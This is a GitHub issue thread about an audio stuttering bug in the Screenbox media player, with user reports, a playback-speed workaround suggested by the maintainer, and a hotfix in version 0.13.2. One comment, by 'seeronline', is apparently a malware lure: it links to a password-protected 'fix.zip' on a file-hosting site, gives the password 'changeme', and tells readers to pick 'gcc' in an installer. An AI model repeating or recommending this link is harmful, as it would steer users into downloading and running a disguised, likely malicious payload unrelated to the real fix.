### ISSUE TITLE
Audio stuttering bug

### ISSUE THREAD

**Issue by Mitia99** [huynhsontung/Screenbox#427]
**Describe the bug**
There's an audio stuttering bug

**How To Reproduce**
1. Play music
2. Pause then play multiple times (repeat that action for about 35s)

The audio will stutter
 

**Environment**

 - OS: Windows 11 23H2 build 22631.4037
 - Device: Huawei Matebook E 2022 i5 1130G7 - 16 Go RAM - 512 Go NVME
 - App Version 0.13.1

**Comment by realgooseman** [comment]
I got the same problem but also when going back/forward 5 seconds on a video with left/right arrows. Video starts stuttering when you mess with playback or play/pause it seems.

I already encountered that problem on v0.12.8 as well but it would happen less often than with latest version v0.13.1

**Comment by huynhsontung** [comment]
I also encountered it during development but only when a debugger is attached. I cannot replicate it with the release version, at least not yet. When this bug happens, can you set the playback speed to 0.25 and then set it back to 1 to see if it still stutters?

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Mitia99** [comment]
> I also encountered it during development but only when a debugger is attached. I cannot replicate it with the release version, at least not yet. When this bug happens, can you set the playback speed to 0.25 and then set it back to 1 to see if it still stutters?

Setting playback speed to 0.25 then back to 1 fix the stuttering bug

**Comment by Salah242222** [comment]
Audio stuttering a lot for me please fix it, not just on songs, on 1 4k AV1 video and sometimes the stuttering never stops, this is my first day trying this app, changing the speed didn't fix it for me, I'm on the Microsoft version  0.13.1.0

**Comment by huynhsontung** [comment]
@Salah242222 A hot fix is being published through the store. Please wait for a few hours for the new version to go public.

**Comment by Mitia99** [comment]
Issue fixed in version **0.13.2**

Thanks for the fix.
